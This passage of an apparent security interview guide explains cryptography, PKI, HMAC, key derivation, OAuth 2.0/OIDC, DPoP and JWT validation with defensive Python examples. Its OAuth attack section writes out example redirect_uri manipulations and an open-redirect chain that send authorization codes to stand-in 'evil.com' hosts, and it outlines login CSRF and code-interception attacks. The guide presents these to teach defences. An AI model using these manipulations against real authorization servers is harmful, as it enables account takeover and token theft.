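B = pow(g, b, p)                 # 5^3 mod 23 = 10  (Bob sends B)
shared_alice = pow(B, a, p)      # 10^4 mod 23 = 18
shared_bob = pow(A, b, p)        # 4^3  mod 23 = 18
assert shared_alice == shared_bob == 18

# 2) Ephemeral exchange: fresh private exponents for every session.
# ASSUMPTION: toy modulus 2^127 - 1 with g = 3, chosen only so the demo runs;
# it is not a vetted DH group. Real systems use X25519 or a standard group.
P_TOY, G_TOY = 2 ** 127 - 1, 3


def run_session() -> int:
    """Derive one session's shared secret from throwaway key pairs."""
    x = secrets.randbelow(P_TOY - 2) + 1        # Alice's ephemeral private key
    y = secrets.randbelow(P_TOY - 2) + 1        # Bob's ephemeral private key
    X, Y = pow(G_TOY, x, P_TOY), pow(G_TOY, y, P_TOY)
    secret = pow(Y, x, P_TOY)
    assert secret == pow(X, y, P_TOY)
    # x and y are dropped when this function returns, so no long-term key can
    # later recompute `secret` (Python cannot securely zero memory, though).
    return secret
```

Two calls to `run_session()` yield unrelated secrets, so compromising one session, or any long-term key, reveals nothing about another.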

6. What is a PKI (Public Key Infrastructure)? How do X.509 certificates and certificate chains work?

PKI solves the public key authentication problem: how do you know the public key you received actually belongs to the entity you think it does? A Certificate Authority (CA) signs certificates that bind a public key to an identity.

# X.509 certificate fields:
Subject: CN=api.example.com, O=Example Corp
Issuer: CN=Let's Encrypt R3  (intermediate CA)
Public Key: EC 256-bit (the server's public key)
Validity: 2024-01-01 to 2024-04-01  (90 days for Let's Encrypt)
Subject Alt Names: api.example.com, www.example.com
Signature: (the issuing CA's signature over all of the fields above)

# Certificate chain:
# Root CA (self-signed, in OS trust store) → Intermediate CA → End-entity cert
# Browser verifies: end-entity signed by intermediate, intermediate signed by root
# Root CA's private key is air-gapped — never touches the internet
# Intermediate CAs do the actual signing of leaf certs

# Why intermediates? If an intermediate is compromised, only that intermediate is revoked.
# Replacing a compromised root would mean updating trust stores everywhere and reissuing every cert that chains to it.

# Certificate Transparency (CT):
# Chrome and Apple platforms require publicly-trusted TLS certs to be logged in public CT logs
# Protects against misissued certs — you can monitor for certs issued for your domain

Certificate validation steps: Verify signature chain up to trusted root; check validity period (not expired); check revocation (CRL or OCSP); verify hostname matches Subject/SAN; check key usage extensions (cert is authorized for the purpose used).
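Hostname verification against the SAN list is the step most often hand-rolled incorrectly. The sketch below is a simplified, hypothetical matcher that accepts a wildcard only as the whole leftmost label; it omits public-suffix rules and IP SANs. In practice Python's `ssl.create_default_context()` already enables chain and hostname checks, as the last lines show.

```python
import ssl
from typing import Iterable


def hostname_matches(pattern: str, hostname: str) -> bool:
    """Simplified RFC 6125-style matching of one SAN entry against a hostname.

    A wildcard is honored only as the entire leftmost label and matches exactly
    one label. Public-suffix checks (rejecting "*.com") are omitted.
    """
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if not pattern.startswith("*."):
        return pattern == hostname
    first_label, dot, rest = hostname.partition(".")
    return bool(first_label) and bool(dot) and rest == pattern[2:]


def matches_any_san(sans: Iterable[str], hostname: str) -> bool:
    return any(hostname_matches(p, hostname) for p in sans)


# In real code, let the TLS library perform the validation steps above:
ctx = ssl.create_default_context()   # chain and hostname verification enabled
assert ctx.verify_mode == ssl.CERT_REQUIRED and ctx.check_hostname
```

With the SANs from the example certificate, `matches_any_san(["api.example.com", "www.example.com"], "www.example.com")` is true, while `*.example.com` would match neither `example.com` nor `a.b.example.com`.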

Certificate pinning: App hardcodes the expected certificate or public key hash. Protects against compromised CAs issuing fraudulent certs. Used by mobile apps and high-security services. Risk: cert rotation breaks the app if pin isn't updated — use with backup pins.

7. What is HMAC and how does it differ from a plain hash? When do you use each?

# HMAC(key, message) = H((K' ⊕ opad) || H((K' ⊕ ipad) || message))
# K' = key zero-padded to the hash block size (hashed first if longer); two nested passes make it immune to length extension

import hmac, hashlib, secrets

key = secrets.token_bytes(32)    # 256-bit secret key
message = b"transfer $1000 to Alice"

mac = hmac.new(key, message, hashlib.sha256).digest()

# Verification — always use compare_digest (constant time!) to prevent timing attacks:
def verify_mac(key, message, received_mac):
    expected = hmac.new(key, message, hashlib.sha256).digest()
    return hmac.compare_digest(expected, received_mac)  # NOT: expected == received_mac
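The HMAC formula can be checked directly against the standard library. This sketch builds HMAC-SHA256 by hand (the `0x36`/`0x5C` pad bytes come from RFC 2104, the 64-byte block from SHA-256) and should produce exactly what `hmac.new` does. It is for understanding only; keep using `hmac` in real code.

```python
import hashlib
import hmac

BLOCK_SIZE = 64   # SHA-256 processes 64-byte blocks


def hmac_sha256_manual(key: bytes, message: bytes) -> bytes:
    """HMAC-SHA256 built directly from the RFC 2104 formula."""
    if len(key) > BLOCK_SIZE:
        key = hashlib.sha256(key).digest()        # long keys are hashed first
    key = key.ljust(BLOCK_SIZE, b"\x00")          # then zero-padded to one block
    ipad_key = bytes(k ^ 0x36 for k in key)
    opad_key = bytes(k ^ 0x5C for k in key)
    inner = hashlib.sha256(ipad_key + message).digest()
    return hashlib.sha256(opad_key + inner).digest()


key = b"k" * 32
msg = b"transfer $1000 to Alice"
assert hmac_sha256_manual(key, msg) == hmac.new(key, msg, hashlib.sha256).digest()
```

The outer hash is computed over a fixed-size inner digest, so appending data to the message cannot extend the final result the way it can with a bare H(key‖message).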

Hash (no key) vs HMAC (with key):

Hash: Anyone can compute it. Use for integrity where secret isn't needed: file checksums, content addressing, digital signatures (sign the hash).
HMAC: Only parties with the key can compute it. Use for authentication: API request signing, CSRF tokens, cookie integrity, webhook signature verification (Stripe uses HMAC-SHA256 for webhook signatures).

Timing attack on MAC comparison: A naive received == expected comparison short-circuits on the first different byte — an attacker can measure response time to guess the MAC byte by byte. hmac.compare_digest() always compares all bytes — constant time regardless of where they differ.

8. What is key derivation? Explain PBKDF2, HKDF, and when you need key stretching.

# PBKDF2 (Password-Based Key Derivation Function 2):
# Stretches low-entropy passwords into cryptographic keys
# Applies HMAC many times (iterations) to make brute force expensive
import hashlib
import os

password = "correct horse battery staple"
salt = os.urandom(16)      # random, unique per user; store it alongside the output
key = hashlib.pbkdf2_hmac(
    'sha256',
    password.encode(),
    salt,
    iterations=600000,     # OWASP 2023 recommendation for PBKDF2-SHA256
    dklen=32               # 256-bit output key
)
# 600K iterations: a few hundred ms per guess on a typical CPU (hardware-dependent)

# HKDF (HMAC-based Key Derivation Function, RFC 5869):
# For deriving MULTIPLE keys from a SINGLE high-entropy secret (not for passwords)
# Two steps: Extract (concentrate the input's entropy into a fixed-length PRK)
#            + Expand (stretch the PRK into output keying material bound to `info`)
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

master = os.urandom(32)    # e.g., a DH shared secret or a random master key

def derive(secret, info, length=32):
    # An HKDF object can only be used once, so build a fresh one per derivation.
    # salt is optional (None here); info is the context string: different info = different key
    return HKDF(algorithm=hashes.SHA256(), length=length, salt=None, info=info).derive(secret)

enc_key = derive(master, b"encryption-key")
mac_key = derive(master, b"mac-key")
# Different info strings = independent keys, no correlation

# When to use which:
# Passwords (low entropy input): PBKDF2, bcrypt, Argon2, scrypt
# High-entropy secret (DH output, random key): HKDF
# Envelope encryption (wrap a DEK with a KEK): AES-KW (Key Wrap) or AES-GCM
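The two HKDF steps are short enough to write out with `hmac` alone. This is an illustrative RFC 5869 sketch fixed to SHA-256 (the function names are hypothetical); it should match `cryptography`'s `HKDF` for the same inputs, and checking it against the RFC's first test vector is a quick sanity test.

```python
import hashlib
import hmac

HASH_LEN = 32  # SHA-256 output length in bytes


def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    """PRK = HMAC-Hash(salt, IKM); a missing salt means HashLen zero bytes."""
    return hmac.new(salt or b"\x00" * HASH_LEN, ikm, hashlib.sha256).digest()


def hkdf_expand(prk: bytes, info: bytes, length: int) -> bytes:
    """T(i) = HMAC-Hash(PRK, T(i-1) || info || i), concatenated and truncated."""
    if length > 255 * HASH_LEN:
        raise ValueError("HKDF-SHA256 can output at most 8160 bytes")
    okm, block = b"", b""
    counter = 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
        okm += block
        counter += 1
    return okm[:length]


def hkdf(ikm: bytes, salt: bytes, info: bytes, length: int = 32) -> bytes:
    return hkdf_expand(hkdf_extract(salt, ikm), info, length)
```

Calling `hkdf(master, b"", b"encryption-key")` and `hkdf(master, b"", b"mac-key")` gives two independent 32-byte keys from the same master secret.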

9. What are common cryptographic mistakes and anti-patterns to avoid?

Rolling your own crypto: The cardinal sin. Even cryptographers make mistakes. Use well-audited libraries (libsodium, cryptography.io). "Don't roll your own crypto" is not just a meme — it's the most important rule.
Using ECB mode: AES-ECB encrypts identical plaintext blocks to identical ciphertext blocks — reveals patterns. The "ECB penguin" (encrypting a penguin bitmap shows the penguin shape). Never use ECB for anything.
Nonce reuse in AES-GCM: Reusing a nonce with the same key breaks GCM: an attacker can recover the authentication key and forge messages, and learns the XOR of the two plaintexts. Use random 12-byte nonces and rotate the key well before 2^32 messages, or use a counter-based nonce.
Comparing MACs with ==: Timing attack. Always use hmac.compare_digest().
Using MD5/SHA-1 for security: Both are broken for collision resistance. Fine for non-security checksums (file dedup), not for signing or integrity in adversarial settings.
Hardcoding keys/secrets: Keys in source code end up in git history, CI logs, container images. Use a secrets manager.
Encrypting but not authenticating (CBC without MAC): Attacker can flip bits in ciphertext without detection. Always use authenticated encryption (AES-GCM, ChaCha20-Poly1305) or encrypt-then-MAC.
Insufficient entropy for key generation: Using random.random() (not cryptographically secure) for key generation. Always use a CSPRNG: the secrets module (or os.urandom) in Python, /dev/urandom or getrandom() on Linux, crypto.getRandomValues() in browsers.

OAuth 2.0 & OIDC

9 questions

1. What is OAuth 2.0 and what problem does it solve? Explain the core roles.

OAuth 2.0 is an authorization framework that allows a third-party application to obtain limited access to a resource on behalf of a user, without the user sharing their credentials with that third party.

The problem it solves: Before OAuth, the only way to let an app access your data (e.g., "sign in with Google to read your calendar") was to give the app your password. If the app was compromised, your credential was too. OAuth delegates scoped authorization without credential sharing.

Core roles:

Resource Owner: The user who owns the data and grants access
Resource Server: The API server that holds the protected resources (Google Calendar API)
Authorization Server: Issues access tokens after authenticating the resource owner (Google's OAuth server)
Client: The third-party application requesting access (your calendar app)

# OAuth 2.0 token types:
# Access Token: short-lived (minutes–hours), used to call the Resource Server API
# Refresh Token: long-lived (days–weeks), used to get new access tokens without re-login
# Authorization Code: short-lived one-time code, exchanged for access token at token endpoint

# Scopes: fine-grained permissions requested by the client
# "read:email profile openid calendar.readonly"
# Resource Owner approves specific scopes — not all-or-nothing

OAuth 2.0 itself is only an authorization framework, not an authentication protocol. It doesn't define how to verify who the user is — that's what OIDC adds on top.

2. Walk through the Authorization Code flow with PKCE. Why is PKCE required for public clients?

Authorization Code flow is the most secure OAuth flow for applications that need ongoing access. PKCE (Proof Key for Code Exchange, RFC 7636) prevents authorization code interception attacks in public clients (SPAs, mobile apps) that can't keep a client_secret.

# Step 1: Client generates PKCE challenge
import secrets, hashlib, base64
code_verifier  = secrets.token_urlsafe(64)        # 64 random bytes → 86-char URL-safe string (RFC 7636: 43-128 chars), kept secret
code_challenge = base64.urlsafe_b64encode(
    hashlib.sha256(code_verifier.encode()).digest()
).rstrip(b'=').decode()

# Step 2: Redirect user to Authorization Server
GET /authorize?
  response_type=code
  &client_id=my-app
  &redirect_uri=https://myapp.com/callback
  &scope=openid profile email
  &state=random_csrf_token     ← MUST validate this on return
  &code_challenge=<code_challenge from step 1>
  &code_challenge_method=S256

# Step 3: User authenticates and approves scopes
# Authorization Server redirects back:
GET /callback?code=AUTH_CODE&state=random_csrf_token

# Step 4: Validate state, exchange code for tokens
POST /token
  grant_type=authorization_code
  &code=AUTH_CODE
  &redirect_uri=https://myapp.com/callback
  &client_id=my-app
  &code_verifier=<code_verifier from step 1>   ← Authorization Server verifies BASE64URL(SHA256(verifier)) == challenge
# Returns: { access_token, id_token, refresh_token, expires_in }

# Why PKCE stops code interception:
# Attacker intercepts the authorization code (e.g., via malicious app on same device)
# Without the code_verifier, the code is useless — can't exchange for tokens
# Only the original requester knows code_verifier
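On the Authorization Server side, the check in step 4 amounts to recomputing the S256 challenge from the presented verifier. A minimal sketch, assuming the server stored the `code_challenge` alongside the authorization code; the helper names are hypothetical, and the example verifier is the test vector from RFC 7636, Appendix B.

```python
import base64
import hashlib
import hmac
import re

# RFC 7636: 43-128 characters from the unreserved set [A-Z a-z 0-9 - . _ ~]
VERIFIER_RE = re.compile(r"[A-Za-z0-9\-._~]{43,128}")


def s256_challenge(code_verifier: str) -> str:
    """code_challenge = BASE64URL(SHA-256(ASCII(code_verifier))), without padding."""
    digest = hashlib.sha256(code_verifier.encode("ascii")).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")


def verify_pkce(code_verifier: str, stored_challenge: str) -> bool:
    """Token-endpoint check: recompute the challenge and compare in constant time."""
    if not VERIFIER_RE.fullmatch(code_verifier):
        return False
    return hmac.compare_digest(s256_challenge(code_verifier), stored_challenge)


# Test vector from RFC 7636, Appendix B:
verifier = "dBjftJeZ4CVP-mB92K27uhbUJU1p1r_wW1gFWFOEjXk"
print(s256_challenge(verifier))   # E9Melhoa2OwvFrEMTJguCHaoeK1t8URWbuGJSstw-cM
```

An attacker holding only the intercepted code and the public challenge would have to invert SHA-256 to produce a verifier that passes `verify_pkce`.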

PKCE is now recommended for ALL clients, not just public clients: the OAuth 2.0 Security Best Current Practice (RFC 9700, January 2025) and the OAuth 2.1 draft both call for it. It provides defense in depth even for confidential clients using a client_secret.

3What OAuth flows exist and when do you use each? Why are Implicit and ROPC deprecated?

Authorization Code + PKCE: The correct choice for almost all user-facing applications — web apps, SPAs, mobile apps. The only flow that supports refresh tokens for SPAs. Use this.

Client Credentials: Machine-to-machine (M2M). No user involved. Service A calls Service B using its own client_id + client_secret. Returns an access token for the service's own identity.

# Client Credentials — used for microservice-to-microservice auth:
POST /token
  grant_type=client_credentials
  &client_id=payment-service
  &client_secret=secret123
  &scope=orders.read inventory.write
# Returns: access_token (no refresh token — just re-request when needed)
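The request above passes the secret as form fields (client_secret_post). RFC 6749 (section 2.3.1) requires servers to support HTTP Basic authentication for client passwords and marks credentials in the request body as NOT RECOMMENDED. A standard-library sketch of building a Basic-authenticated request; the helper name is hypothetical:

```python
import base64
from urllib.parse import quote_plus, urlencode


def client_credentials_request(client_id: str, client_secret: str, scopes: list):
    """Return (headers, body) for a client_credentials token request.

    Per RFC 6749 section 2.3.1, client_id and client_secret are form-urlencoded
    before being joined with ':' and base64-encoded for HTTP Basic auth.
    """
    userpass = f"{quote_plus(client_id)}:{quote_plus(client_secret)}"
    headers = {
        "Authorization": "Basic " + base64.b64encode(userpass.encode()).decode(),
        "Content-Type": "application/x-www-form-urlencoded",
    }
    body = urlencode({"grant_type": "client_credentials", "scope": " ".join(scopes)})
    return headers, body


headers, body = client_credentials_request(
    "payment-service", "secret123", ["orders.read", "inventory.write"]
)
```

Sending the secret in a header rather than the body also keeps it out of request-body logging.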

Device Code (Device Authorization Grant): For input-constrained devices (smart TV, CLI tools). Device displays a short code, user visits a URL on another device to approve. CLI tools like GitHub CLI use this.

Implicit flow (DEPRECATED): Returned the access token directly in the URL fragment, with no code exchange. Vulnerabilities: the token is exposed in browser history, Referer headers, and logs; the client has no reliable way to detect a token injected by an attacker or issued to a different client; and the token cannot be bound (sender-constrained) to the client. Never use.

Resource Owner Password Credentials / ROPC (DEPRECATED): User gives username/password directly to the client, which exchanges them for a token. Defeats the entire purpose of OAuth — the client sees the credentials. Only legacy migration justified this; OAuth 2.1 removes it entirely.

4What is OpenID Connect (OIDC)? How does it extend OAuth 2.0 for authentication?

OIDC is an authentication layer built on top of OAuth 2.0. OAuth 2.0 only handles authorization (access to resources). OIDC adds a standardized way to authenticate users and obtain their identity — it's "OAuth 2.0 + identity."

What OIDC adds to OAuth 2.0:

ID Token: A signed JWT containing user identity claims (sub, email, name, picture). Returned alongside the access token.
UserInfo endpoint: Standardized endpoint to fetch user profile data using the access token.
Standard scopes: openid (required), profile, email, address, phone
Discovery endpoint: /.well-known/openid-configuration — publishes all endpoints and supported capabilities

# OIDC ID Token claims:
{
  "iss": "https://accounts.google.com",    # issuer
  "sub": "110169484474386276334",          # subject (unique user ID at this IdP)
  "aud": "my-client-id",                  # audience (your client_id)
  "exp": 1735689600,                       # expiry
  "iat": 1735686000,                       # issued at
  "nonce": "random_nonce",                 # replay protection
  "email": "alice@example.com",
  "email_verified": true,
  "name": "Alice Smith",
  "picture": "https://..."
}

# Key validation steps for ID Token:
# 1. Verify signature using IdP's public keys (from JWKS endpoint)
# 2. Verify iss matches expected issuer
# 3. Verify aud matches your client_id
# 4. Verify exp hasn't passed
# 5. Verify nonce matches what you sent (replay protection)
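Once a JOSE library has verified the signature (step 1), steps 2-5 are plain comparisons. A standard-library sketch; the function and exception names are hypothetical, and the 60-second leeway for clock skew is an assumption:

```python
import hmac
import time


class IdTokenError(ValueError):
    pass


def check_id_token_claims(claims, expected_issuer, client_id, expected_nonce,
                          now=None, leeway=60):
    """Steps 2-5; assumes the signature (step 1) was already verified."""
    now = time.time() if now is None else now
    if claims.get("iss") != expected_issuer:
        raise IdTokenError("unexpected issuer")
    aud = claims.get("aud")
    audiences = aud if isinstance(aud, list) else [aud]  # aud may be a string or a list
    if client_id not in audiences:
        raise IdTokenError("token was not issued for this client")
    exp = claims.get("exp")
    if not isinstance(exp, (int, float)) or exp + leeway < now:
        raise IdTokenError("missing or expired exp")
    nonce = claims.get("nonce")
    if not isinstance(nonce, str) or not hmac.compare_digest(
        nonce.encode(), expected_nonce.encode()
    ):
        raise IdTokenError("nonce mismatch (possible replay)")
    return claims
```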

Access token vs ID token: the ID token is for the client; it proves who the user is, and the client reads its claims directly. The access token is for the resource server; the client should treat it as an opaque bearer credential for calling APIs and not parse its claims, even when it happens to be a JWT, because its format is a contract between the Authorization Server and the API.

5What is the state parameter and nonce in OAuth/OIDC? What attacks do they prevent?

# STATE parameter — prevents CSRF on the OAuth redirect
# Flow:
# 1. Client generates random state: state = secrets.token_urlsafe(32)
# 2. Client stores state in session: session["oauth_state"] = state
# 3. Include in authorization request: &state={state}
# 4. Authorization Server echoes it back in redirect: /callback?code=...&state={state}
# 5. Client MUST verify: session["oauth_state"] == returned_state
#    If they don't match → CSRF attack → reject!

# Attack without state (login CSRF):
# 1. Attacker starts the OAuth flow with their OWN account and approves consent
# 2. Attacker intercepts the redirect and stops before the code is redeemed:
#    /callback?code=ATTACKER_CODE
# 3. Attacker tricks victim into loading that callback URL (e.g., in an img tag)
# 4. Victim's client redeems the attacker's code: the victim is now logged in as
#    (or has linked their account to) the attacker's identity

# NONCE — prevents ID token replay attacks in OIDC
# 1. Client generates random nonce: nonce = secrets.token_urlsafe(32)
# 2. Client stores nonce (hashed) in session
# 3. Include in authorization request: &nonce={nonce}
# 4. Authorization Server embeds nonce in the ID Token
# 5. Client verifies nonce in received ID Token matches what was sent
#    If nonce was already used or doesn't match → replay → reject!

# Replay attack without nonce:
# Attacker captures a valid ID Token
# Attacker tries to use that same token at a different session/time
# Nonce check prevents this — token is bound to the specific auth request

import secrets
state = secrets.token_urlsafe(32)
nonce = secrets.token_urlsafe(32)
# Store both in session before redirect; validate both on callback
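A minimal sketch of generating both values and checking state on the callback, assuming a dict-like server-side session; the helper names are hypothetical. Popping the stored state makes each value single-use:

```python
import hmac
import secrets


def start_login(session: dict) -> dict:
    """Create state and nonce, remember them server-side, return them for the redirect."""
    session["oauth_state"] = secrets.token_urlsafe(32)
    session["oauth_nonce"] = secrets.token_urlsafe(32)
    return {"state": session["oauth_state"], "nonce": session["oauth_nonce"]}


def check_callback_state(session: dict, returned_state) -> None:
    """Reject the callback unless it echoes the state this session generated."""
    expected = session.pop("oauth_state", None)  # pop: each state is usable once
    if (
        expected is None
        or not isinstance(returned_state, str)
        or not hmac.compare_digest(expected.encode(), returned_state.encode())
    ):
        raise PermissionError("state mismatch: possible CSRF, rejecting callback")
```

The stored nonce stays in the session until the ID token arrives and is compared against its nonce claim.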

6How does token refresh work? What are the security considerations for refresh tokens?

# Token refresh flow:
POST /token
  grant_type=refresh_token
  &refresh_token={refresh_token}
  &client_id=my-app
  &client_secret=my-secret   # for confidential clients

# Returns:
{
  "access_token": "new_access_token",
  "expires_in": 3600,
  "refresh_token": "new_refresh_token"   # rotation: a new refresh token on every refresh
}

# Refresh token security best practices:

# 1. Refresh token rotation (described in RFC 6749 §10.4; RFC 9700 requires it, or sender-constraining, for public clients):
# Every use of a refresh token returns a NEW refresh token
# Old refresh token is immediately invalidated
# If attacker uses a stolen (already-used) refresh token → server detects reuse
# Server should revoke all tokens for that user on reuse detection (replay attack)

# 2. Sender-constrained refresh tokens (DPoP - RFC 9449):
# Bind token to a client's proof-of-possession key
# Even if token is stolen, attacker can't use it without the private key

# 3. Storage:
# Web app: HttpOnly, Secure, SameSite=Strict cookie (not localStorage!)
# Mobile: OS keychain (iOS) or Keystore (Android)
# Backend: encrypted in database
# NEVER: localStorage or sessionStorage (accessible to JS = XSS risk)

# 4. Short-lived access tokens + long-lived refresh tokens:
# Access token: 5-15 minutes (limits damage if stolen)
# Refresh token: 30 days with sliding expiry (balance security vs UX)

# 5. Absolute expiry:
# Even if refresh token is used regularly, force re-authentication after X days
# "You've been logged in for 90 days, please re-authenticate"
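A minimal in-memory sketch of rotation with reuse detection (practice 1). Tokens from one login share a family ID so that a replay can revoke the whole chain; the class name and storage are hypothetical, and a real server would persist hashes of the tokens rather than the tokens themselves:

```python
import secrets


class RefreshTokenStore:
    """Rotation with reuse detection; in-memory stand-in for a database table."""

    def __init__(self):
        self.tokens = {}      # token -> {"family": str, "used": bool}
        self.revoked = set()  # revoked family IDs

    def issue(self, family=None):
        family = family or secrets.token_hex(8)  # new login -> new family
        token = secrets.token_urlsafe(32)
        self.tokens[token] = {"family": family, "used": False}
        return token

    def rotate(self, token):
        """Exchange a refresh token for a new one in the same family."""
        record = self.tokens.get(token)
        if record is None or record["family"] in self.revoked:
            raise PermissionError("unknown or revoked refresh token")
        if record["used"]:
            # An already-rotated token came back: assume theft, kill the family
            self.revoked.add(record["family"])
            raise PermissionError("refresh token reuse detected; family revoked")
        record["used"] = True
        return self.issue(record["family"])
```

Revoking the family means that whichever party holds the newest token, legitimate user or attacker, is forced to re-authenticate.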

7What are OAuth 2.0 token introspection and revocation? How do you validate access tokens?

# Two approaches to token validation at the Resource Server:

# Approach 1: Local JWT validation (preferred for performance)
# Resource Server validates the JWT signature using the Authorization Server's public keys
# No per-request network call: the public keys are fetched once and cached
# Drawback: can't know if token was revoked until it expires
import jwt  # PyJWT, installed with the crypto extra: pip install "pyjwt[crypto]"

# PyJWKClient downloads and caches the JWKS; create it once, not per request.
# Example JWKS URL: read the real one from the issuer's discovery document (jwks_uri).
jwks_client = jwt.PyJWKClient("https://auth.example.com/.well-known/jwks.json")

def validate_access_token(token):
    signing_key = jwks_client.get_signing_key_from_jwt(token)   # matched by the header's kid
    claims = jwt.decode(token, signing_key.key, algorithms=["RS256", "ES256"],
                        audience="my-api", issuer="https://auth.example.com")
    return claims  # raises jwt.InvalidTokenError (or a subclass) if invalid

# Approach 2: Token introspection (RFC 7662) — real-time check
# Calls Authorization Server to check if token is active
POST /introspect
  Authorization: Basic {base64(client_id:client_secret)}
  token={access_token}

# Response:
{ "active": true, "sub": "user123", "scope": "read write", "exp": 1735689600 }
# { "active": false }  ← token revoked or expired

# Token revocation (RFC 7009):
POST /revoke
  token={refresh_token}
  &token_type_hint=refresh_token
  &client_id=my-app
  &client_secret=secret

# Revocation use cases:
# User clicks "logout" → revoke refresh token
# User changes password → revoke all tokens
# Suspicious activity detected → revoke all sessions
# Admin removes user's access → revoke all their tokens

8What is DPoP (Demonstration of Proof of Possession)? How does it prevent token theft?

Standard OAuth access tokens are bearer tokens — anyone who possesses the token can use it. If stolen (via XSS, log exposure, MITM on internal networks), the attacker has full access until the token expires.

DPoP (RFC 9449) binds access tokens to a client's cryptographic key pair. Each API request must include a proof that the requester holds the private key corresponding to the public key in the token.

# DPoP flow:
# 1. Client generates a key pair (typically per session or per client instance; it must stay the same for as long as tokens are bound to it)
# 2. Client includes the public key in the DPoP proof JWT sent during token request
# 3. Authorization Server binds the public key's RFC 7638 thumbprint into the access token (cnf.jkt claim)
# 4. For every API call, client generates a fresh DPoP proof JWT signed with private key:
{
  "typ": "dpop+jwt",
  "alg": "ES256",
  "jwk": { "kty": "EC", "crv": "P-256", ... }  # public key
}.{
  "jti": "unique-id",           # unique per request (prevents replay)
  "htm": "GET",                  # HTTP method
  "htu": "https://api.example.com/data",  # HTTP URI
  "iat": 1735686000,             # issued at
  "ath": "access_token_hash"     # hash of the access token (binds proof to token)
}

# 5. Resource Server validates:
#    - DPoP proof signature using the public key in the proof header
#    - Access token's cnf.jkt claim matches the thumbprint of the proof's public key
#    - jti hasn't been seen before (replay prevention)
#    - htm/htu match the actual request
#    - iat is recent (prevent delayed replay)

# Result: stolen token is useless without the private key
# Mitigation of: XSS token theft, log-based token exposure, internal MITM
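The two bindings in steps 3 and 5 are plain SHA-256 hashes. A standard-library sketch of how a resource server might compute them, assuming an EC P-256 public key in JWK form; verifying the proof's ES256 signature needs a JOSE library and is omitted, and the helper names are hypothetical:

```python
import base64
import hashlib
import json


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def jwk_thumbprint(jwk: dict) -> str:
    """RFC 7638 SHA-256 thumbprint of an EC public key (the value carried in cnf.jkt)."""
    # Only the required EC members, keys sorted lexicographically, no whitespace
    required = {name: jwk[name] for name in ("crv", "kty", "x", "y")}
    canonical = json.dumps(required, sort_keys=True, separators=(",", ":"))
    return b64url(hashlib.sha256(canonical.encode("utf-8")).digest())


def access_token_hash(access_token: str) -> str:
    """The DPoP proof's ath claim: base64url(SHA-256(ASCII access token))."""
    return b64url(hashlib.sha256(access_token.encode("ascii")).digest())
```

The resource server would compare jwk_thumbprint(proof_header["jwk"]) with the access token's cnf.jkt, and access_token_hash(token) with the proof's ath claim. Extra JWK members such as kid are deliberately excluded so the thumbprint is stable.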

9What are common OAuth 2.0 attack vectors? Explain redirect_uri manipulation and open redirectors.

# Attack 1: redirect_uri manipulation
# Vulnerable: Authorization Server accepts wildcard/partial matches
# Legitimate: redirect_uri=https://myapp.com/callback
# Attack:     redirect_uri=https://myapp.com.evil.com/steal
#             redirect_uri=https://myapp.com/callback/../steal
# If accepted, authorization code is sent to attacker's server

# Fix: exact string matching for redirect_uri, registered at client registration
# Never allow wildcards, path traversal, or partial matches

# Attack 2: Authorization Code Interception (without PKCE)
# Malicious app on the same device registers the same custom URL scheme
# Legitimate: myapp://callback → authorization code delivered to app
# Attack: malicious app also claims myapp:// → OS may deliver myapp://callback?code=... to it
# Fix: PKCE (code_verifier proves it's the same process that started the flow)

# Attack 3: Open Redirector
# If your app has an open redirect vulnerability:
# https://myapp.com/redirect?url=https://evil.com
# Attacker crafts: redirect_uri=https://myapp.com/redirect?url=https://steal.evil.com
# Auth server sees myapp.com → validates, redirects code → open redirector → evil.com
# Fix: whitelist redirect_uri exactly; eliminate open redirectors

# Attack 4: Mix-Up Attack
# When a client talks to multiple Authorization Servers, an attacker-controlled AS tricks
# the client into sending a code issued by an honest AS to the attacker's token endpoint
# Fix: Issuer identification in the authorization response (RFC 9207 iss parameter)

# Attack 5: Insufficient scope validation
# Client requests minimal scopes but some servers grant more
# Fix: Resource server checks that the token carries the specific scope each operation requires

# Defense summary:
# - Exact redirect_uri matching
# - Always validate state parameter
# - PKCE for every authorization code flow
# - Short access token lifetimes
# - Refresh token rotation with reuse detection
# - Token binding (DPoP) for high-security applications
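For Attack 1, the whole fix is comparing strings exactly. A sketch contrasting exact matching with the vulnerable prefix check, assuming a hypothetical set of URIs registered for one client:

```python
# Hypothetical registration data for one client
REGISTERED_REDIRECT_URIS = {"https://myapp.com/callback"}


def redirect_uri_allowed(requested: str) -> bool:
    """Exact string comparison against pre-registered URIs: no prefix or wildcard logic."""
    return requested in REGISTERED_REDIRECT_URIS


def prefix_match_allowed(requested: str) -> bool:
    """The VULNERABLE pattern, shown for contrast: any URI starting with the prefix passes."""
    return requested.startswith("https://myapp.com")
```

With prefix matching, https://myapp.com.evil.com/steal passes; with exact matching, every variant from Attack 1 is rejected.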

JWT & Token Security

7 questions

1What is a JWT? Explain its structure, how it's signed, and how to validate it.

A JWT (JSON Web Token, RFC 7519) is a compact, URL-safe token consisting of three Base64URL-encoded JSON parts separated by dots: header.payload.signature.

# Structure:
# header: {"alg": "RS256", "typ": "JWT", "kid": "key-id"}
# payload: {"sub": "user123", "iss": "https://auth.example.com", "exp": 1735689600, ...}
# signature: RS256_sign(private_key, base64url(header) + "." + base64url(payload))

# Signing algorithms:
# RS256: RSA signature with SHA-256 — asymmetric, server signs with private key,
#         anyone can verify with public key (most common in OIDC)
# HS256: HMAC-SHA256 — symmetric, same secret for sign+verify
#         (only use for internal services where all parties share the secret)
# ES256: ECDSA with P-256 — asymmetric, smaller keys than RSA

# Validation checklist:
import jwt  # PyJWT
def validate_jwt(token, public_key):
    claims = jwt.decode(
        token,
        public_key,
        algorithms=["RS256"],           # MUST specify — never allow "none"
        audience="my-service",          # verify aud claim
        issuer="https://auth.example.com",  # verify iss claim
        options={
            "verify_exp": True,         # verify expiry
            "verify_nbf": True,         # verify not-before
            "require": ["exp", "iat", "sub"],  # required claims
        }
    )
    return claims

# Critical: validate EVERY claim:
# 1. sig: cryptographic signature valid?
# 2. alg: expected algorithm? (prevent algorithm confusion)
# 3. exp: not expired?
# 4. nbf: not-before has passed?
# 5. iss: from trusted issuer?
# 6. aud: intended for this service?
